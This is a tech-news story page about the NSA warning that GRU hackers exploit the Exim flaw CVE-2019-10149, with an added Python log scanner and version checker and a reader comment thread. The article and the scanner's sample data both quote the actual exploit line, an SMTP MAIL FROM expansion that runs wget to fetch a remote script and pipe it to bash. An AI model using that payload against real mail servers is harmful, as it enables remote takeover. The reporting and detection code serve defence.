
posted by Fnord666 on Saturday May 30 2020, @03:23PM
from the patch-your-servers-now! dept.

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be

That hexadecimal decodes to:

/bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
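Anyone grepping their own SMTP logs or packet captures for this attack wants two things the article only describes in prose: a way to undo the \xHH escapes so the hidden command is readable, and a quick test of whether the local Exim build falls in the affected range. The Python below is an added example written for this page; it is not code from the article, the NSA advisory, Qualys or Exim. The SMTP lines are constructed (the payload line mirrors the shape quoted above, keeping The Register's "hxxp" defanging), and the version boundaries (4.87 through 4.91 vulnerable, fixed from 4.92) come from the Qualys advisory the article links to, not from the article text itself.

```python
"""Decode Exim expansion escapes in SMTP envelope addresses, flag ${run{...}}
payloads (CVE-2019-10149 pattern), and classify an Exim version banner.
Added example for this page; not code from the article, NSA, Qualys or Exim."""
import re
from typing import List, Tuple

# Backslash escapes accepted inside Exim expansion strings: \xHH, \t, \n, \r,
# and a backslash in front of any other character, which simply yields that
# character (that is how the quoted payload writes \: and \hostapp.be).
_ESCAPE_RE = re.compile(r"\\(x[0-9A-Fa-f]{2}|.)", re.DOTALL)
_SIMPLE = {"t": "\t", "n": "\n", "r": "\r"}


def decode_exim_escapes(text: str) -> str:
    """Return text with Exim-style backslash escapes resolved."""
    def repl(m):
        tok = m.group(1)
        if tok[0] == "x" and len(tok) == 3:
            return chr(int(tok[1:], 16))
        return _SIMPLE.get(tok, tok)
    return _ESCAPE_RE.sub(repl, text)


def extract_run_commands(address: str) -> List[str]:
    """Find every ${run{...}} item in an envelope address and return the
    decoded command each would execute.  Braces are matched so nested
    expansion items inside the command stay intact."""
    cmds: List[str] = []
    marker = "${run{"
    pos = address.find(marker)
    while pos != -1:
        start = pos + len(marker)
        depth, i = 1, start
        while i < len(address) and depth:
            if address[i] == "{":
                depth += 1
            elif address[i] == "}":
                depth -= 1
            i += 1
        if depth:  # unterminated item: Exim would fail the expansion instead
            break
        cmds.append(decode_exim_escapes(address[start:i - 1]))
        pos = address.find(marker, i)
    return cmds


_ENVELOPE_RE = re.compile(r"^\s*(MAIL FROM|RCPT TO):\s*<?([^>\r\n]*)>?", re.IGNORECASE)


def scan_smtp_lines(lines) -> List[Tuple[int, str, str]]:
    """Return (line number, verb, decoded command) for each envelope address
    carrying a ${run{...}} item.  A legitimate address never contains '${',
    so any expansion item in MAIL FROM / RCPT TO deserves an alert."""
    findings: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, 1):
        m = _ENVELOPE_RE.match(line)
        if not m:
            continue
        for cmd in extract_run_commands(m.group(2)):
            findings.append((n, m.group(1).upper(), cmd))
    return findings


def exim_version_vulnerable(bv_output: str) -> bool:
    """Parse the banner printed by `exim -bV` ('Exim version 4.91 #1 ...') and
    report whether it lies in the CVE-2019-10149 range 4.87 <= v < 4.92
    (range per the Qualys advisory; builds older than 4.87 or 4.92+ are not)."""
    m = re.search(r"Exim version (\d+)\.(\d+)", bv_output)
    if not m:
        raise ValueError("no Exim version banner found")
    ver = (int(m.group(1)), int(m.group(2)))
    return (4, 87) <= ver < (4, 92)


# Constructed sample session: two benign envelope commands, then the payload
# shape quoted in the article (hxxp is the article's defanging, kept as-is).
SAMPLE_SESSION = [
    "MAIL FROM:<alice@example.net>",
    "RCPT TO:<bob@example.org>",
    r"MAIL FROM:${run{\x2Fbin\x2Fsh\t-c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be",
]

if __name__ == "__main__":
    for n, verb, cmd in scan_smtp_lines(SAMPLE_SESSION):
        print(f"line {n}: {verb} carries a ${{run}} payload -> {cmd!r}")
    banner = "Exim version 4.91 #1 built 01-Jan-2019"  # constructed banner
    print("vulnerable build:", exim_version_vulnerable(banner))
```

Feed it the envelope lines from an Exim reject log or a capture of port 25 traffic; on a vulnerable host the same `${run{` payload also appears in `RCPT TO`, which is why the scanner matches both verbs. The version check is a triage aid only: the NSA advisory tells administrators to move to a current release rather than stop at the first fixed one.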



Related Stories

400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks 24 comments

A bug in an obscure but widely used email program may be putting as many as 400,000 servers around the world at risk of serious attack until they install an update.

The flaw—which is in all releases of the Exim message transfer agent except for version 4.90.1—opens servers to attacks that can execute malicious code, researchers who discovered the vulnerability warned in an advisory published Tuesday. The buffer overflow vulnerability, which is indexed as CVE-2018-6789, resides in the base64 decode function. By sending specially manipulated input to a server running Exim, attackers may be able to remotely execute code.



  • (Score: 3, Insightful) by Mojibake Tengu on Saturday May 30 2020, @03:41PM (8 children)

    by Mojibake Tengu (8598) on Saturday May 30 2020, @03:41PM (#1001033) Journal

    the flaw was introduced in Exim 4.87 and patched back in June of 2019

    So, the maybe-Russians are working with a maybe-NSA backdoor introduced on April 6, 2016, which was already fixed about a year ago, right?
    What we really need to know is the name of the guy who created the backdoor.
    Because, now we need to check everything this guy did.

    --
    Respect Authorities. Know your social status. Woke responsibly.
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @04:19PM

      by Anonymous Coward on Saturday May 30 2020, @04:19PM (#1001053)

      https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt [qualys.com] :

      Because expand_string() recognizes the "${run{<command> <args>}}" expansion item,

      What more need be said?! *FACEPALM*

    • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @04:59PM (6 children)

      by Anonymous Coward on Saturday May 30 2020, @04:59PM (#1001067)

      Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

      • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @05:02PM (1 child)

        by Anonymous Coward on Saturday May 30 2020, @05:02PM (#1001068)

        You may joke, but that was my first, second, and third thought. Probably still leaning that way. I'm not kidding -- there's a Boy Who Cried Wolf issue here and Democrats, the legacy media, and their compadres in the Executive branch police and surveillance agencies are 100% at fault.

        • (Score: -1, Offtopic) by Anonymous Coward on Saturday May 30 2020, @05:50PM

          by Anonymous Coward on Saturday May 30 2020, @05:50PM (#1001090)

          Shit, they're rejecting the narrative. I know you're reading this, Bob. I told you so! We should have gone with clowncels instead.

      • (Score: 5, Touché) by ilPapa on Saturday May 30 2020, @05:52PM (3 children)

        by ilPapa (2366) on Saturday May 30 2020, @05:52PM (#1001091) Journal

        Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

        You dumb sonofabitch. Donald Trump is now in charge of the NSA.

        --
        You are still welcome on my lawn.
        • (Score: 0, Insightful) by Anonymous Coward on Saturday May 30 2020, @06:44PM (1 child)

          by Anonymous Coward on Saturday May 30 2020, @06:44PM (#1001106)

          >> You dumb sonofabitch. Donald Trump is now in charge of the NSA.

          You dumb sonofabitch. In Soviet America, the GRU is now in charge of Donald Trump.

          • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @08:35PM

            by Anonymous Coward on Saturday May 30 2020, @08:35PM (#1001150)

            Bastards. First the filthy, dirty, BO stink of the Incelabteilung murders Rosa Luxemburg, then grues eat Leon Trotsky, and now the Incelabteilung is in cahoots with the grues!

            Only Lysol and fluorescent lights can solve this!

        • (Score: 0) by Anonymous Coward on Wednesday June 03 2020, @01:41AM

          by Anonymous Coward on Wednesday June 03 2020, @01:41AM (#1002538)

          Okay, so, that makes them what? good? or evil?

  • (Score: 1) by RandomFactor on Saturday May 30 2020, @03:45PM (7 children)

    by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @03:45PM (#1001037) Journal

    Although hardly universal, many of the 'at risk' systems will be behind perfectly capable email security layers (Proofpoint, Barracuda, Mimecast, EOP, GSuite etc.) which would have blocked this within hours or days of the original disclosure.
     
    This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

    --
    In Pravda there is no news, and in Izvestia there is no truth
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @05:05PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @05:05PM (#1001070)

      anyone who uses that disgusting list of glorified spyware is a ridiculous suited whore.

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @06:27PM

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @06:27PM (#1001101) Journal

        Large scale environments do tend to be run by suits. Not saying they have to be, but it is certainly the norm.
         
        And yes, tearing in transit emails apart every conceivable way and analyzing, sandboxing and doing real-time analytics tracking and reporting of attacks is fundamentally not something conducive to perfect privacy, even with contractual obligations and privacy certifications typically in place. I listed some industry leaders in the space (there are many others depending on acceptable capabilities - Intel, Forcepoint, Cisco, Trend, Area 1...)
         
        What do you recommend that better protects privacy and retains capabilities necessary to properly protect large organizations at this layer?

        --
        In Pravda there is no news, and in Izvestia there is no truth
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:19PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @07:19PM (#1001120)

      Although hardly universal, many of the 'at risk' systems will be behind perfectly capable email security layers (Proofpoint, Barracuda, Mimecast, EOP, GSuite etc.) which would have blocked this within hours or days of the original disclosure...

      Sits here, watching all the dubious traffic from Russia (and, surprisingly, the Seychelles) getting shitcanned within 2-5 seconds of anyone trying this exploit...not that it matters, as my Exim installs are up to date. And no, it's not a commercial 'security layer'.

      This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

      I detect the spoor of suitery here, so you might find this story amusing. I once cobbled together a reactive firewall setup which usually detected & blocked dubious traffic based on content or pattern within two seconds, we were approached by a couple of suited wonks who somehow gained knowledge of the setup (I still, to this day, don't know who leaked, I have my suspicions that it was one of the local CERT mob...they'd tried penetrating our little section of the network so many times), to say their faces fell with the realisation that all the code driving this, bar the Perl 'glue' code, that, thanks to my contract, belonged to my employer, was all GPL, so they couldn't buy it off us...(for added fun fact points relevant to the article, this setup used Exim listening on a non-standard port for alert passing between remote sites, dodgy traffic identified at site A?, sites B,C..X got the message and blocked the meddlesome bastards before they got to them)

      That was 20 years ago, my current setup is the spiritual descendant of that one (different hardware and OS configuration, and, obviously I don't work where I set that one up, so the code isn't the same), the reason the reaction time is greater than two seconds is down to the fact I'm running it on old hardware, the reason I'm running it on old hardware is that the bloody hardware is more reliable (last uptime before I moved the setup, just over two years.).

      I do not work for a larger organisation... as such, I don't have to put up with the BS that goes with working for said larger organisations, I get to spend a lot more of my time actually keeping shit patched and secure without having to sit on my arse waiting for a magically blessed corporate solution to appear... speaking of which, I have another story here about a system-wide virus infection that the paid-for 'email security layer' at one place of employ allowed in through the thus protected email and merrily started infesting everything it could on the shared corporate drives, it had flagged up on my monitoring as, being a sneaky cunt, I had a world read-write samba share on a linux box with a couple of exe and doc files with an alert generated if they were altered, and which IP number (and domain user) altered them, the logs were fun that day, and the next, and the day after...
      I warned the domain admin something was going on...one week later, the software finally gets the update which detects the infection, by this time it had managed to infect almost all the machines within the organisation, almost all, that is, excluding the ones I was responsible for.
      Pity it had gotten to the finance machines, pity one of the finance team had admin rights...

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @10:31PM

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @10:31PM (#1001194) Journal

        Yeah, we are talking about entirely different worlds that require very different capabilities to protect.
         
        There is a cocktail of methods that are used for protecting larger organizations with the typical diversity of systems, mailers, clients, users, patch levels, usage cases, & traffic profiles.
         
        For perspective, some of these are:
         
          - Sandboxing incoming files and looking for bad behavior,
          - scraping emails for passwords contained within them and using those to decrypt and sandbox,
          - scanning links for malicious sites of various sorts (credential phishing, malicious downloads)
          - Spoofing, Impersonation and BEC attacks
          - Sender reputation tracking
          - re-scanning links periodically in case the bad guys change the site to be malicious after delivery
          - Tracking emails determined to be malicious post delivery and pulling them from the mailboxes they were delivered to
          - - Following any forwarding or replies within the organization and removing those copies as well
          - Generating alerts on individuals that threats were delivered to
          - Tracking which users actually interacted with threat sites
          - Quarantining blocked emails and allowing direct user interaction to (safely) examine and release blocked emails,
          - Integration with other tools in the environment
          - - allow simulated malicious emails to train users
          - - If a link is bad block it at the firewalls/proxy
          - - block bad files from execution on workstations
          - allow end users to report and individually block spam and malware,
          - Scan OUTBOUND email to capture email, alert, and block if an internal user gets popped
          - Track and report on trends, attackers, campaigns in use against the organization
         
        And these capabilities need to be updated approaching real time.

        --
        In Pravda there is no news, and in Izvestia there is no truth
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:34PM (2 children)

      by Anonymous Coward on Saturday May 30 2020, @07:34PM (#1001126)

      This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

      But not to those who use sendmail [wikipedia.org] or postfix [wikipedia.org] instead of exim.

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @08:11PM (1 child)

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @08:11PM (#1001142) Journal

        Ahhh for a business that only used one standard bit of kit globally :-p

        --
        In Pravda there is no news, and in Izvestia there is no truth
        • (Score: 0) by Anonymous Coward on Sunday May 31 2020, @12:12AM

          by Anonymous Coward on Sunday May 31 2020, @12:12AM (#1001227)

          Ahhh for a business that only used one standard bit of kit globally :-p

          In this case, as long as it's not exim [wikipedia.org], it's all good.

  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @03:54PM

    by Anonymous Coward on Saturday May 30 2020, @03:54PM (#1001040)

    Anyone who hasn't updated since that bug was published is already hacked by someone else. That warning seems useless.

  • (Score: 1, Troll) by Anonymous Coward on Saturday May 30 2020, @04:56PM (2 children)

    by Anonymous Coward on Saturday May 30 2020, @04:56PM (#1001065)

    Oh brother! Gremlins, little green men. Damn democrats will do anything to keep this stupid game running. Trump is about to be reelected and they still haven't found a replacement

    The NSA. They were soooo evil before 2016. What happened?

    • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @06:54PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @06:54PM (#1001108)

      >> Trump is about to be reelected and they still haven't found a replacement

      Sure they have... they've got that old man who can't remember his email password (ensuring no repeat of HillaryGate) and his running mate the Minnesota woman who hates blacks.

      • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @07:43PM

        by Anonymous Coward on Saturday May 30 2020, @07:43PM (#1001129)

        >> Trump is about to be reelected and they still haven't found a replacement

        Sure they have... they've got that old man who can't remember his email password (ensuring no repeat of HillaryGate) and his running mate the Minnesota woman who hates blacks.

        Given that the polls show Ds out in front [fivethirtyeight.com], including Biden vs. Trump [270towin.com] in pretty much every battleground state, I'm not sure where GP gets the idea that Trump is a sure thing.

        That's weird, I didn't realize that Stacey Abrams [wikipedia.org] was from Minnesota, or that she doesn't like blacks. Perhaps she just prefers fucking white men (or women, or both)?

        And just because you prefer fucking a particular type, it doesn't mean you *hate* those who aren't that type. Besides, what does a candidate's sex life have to do with anything?

  • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:49PM

    by Anonymous Coward on Saturday May 30 2020, @07:49PM (#1001135)

    Unlike exim, Russian hackers can't use vi for nefarious purposes.

  • (Score: 3, Informative) by Pav on Saturday May 30 2020, @10:39PM

    by Pav (114) on Saturday May 30 2020, @10:39PM (#1001197)

    Perhaps Russian hackers attached to the kremlin DID do this... but because this story seems to mesh with a certain narrative, and because of that context I thought I'd mention significant LEFT critiques of Russiagate posted recently - this issue is not strictly divided along partisan lines as many would like us to believe.

    Glenn Greenwald from The Intercept, a journalist who broke the Snowden story and who has enough of a legal background to have insight into issues of law, comments on the Flynn case and the wider Russiagate context [youtube.com].

    Aaron Mate and Matt Taibbi [youtube.com], both winners of the I.F. "Izzy" Stone independent journalism award, published at The Hill, The Nation and many other left publications, also discuss the Flynn case and Russiagate.

  • (Score: -1, Troll) by Anonymous Coward on Sunday May 31 2020, @12:19AM

    by Anonymous Coward on Sunday May 31 2020, @12:19AM (#1001229)

    The sneaky Russians had the virus infect a fat white cop, forcing him to sit on George Floyd's neck. Now the USA is going to collapse as African-Americans give whitey what's coming to him... Atlanta burns. LA burns. Seattle burns. St Greta is conflicted with sudden racist thoughts when she realizes how much carbon is being released today.
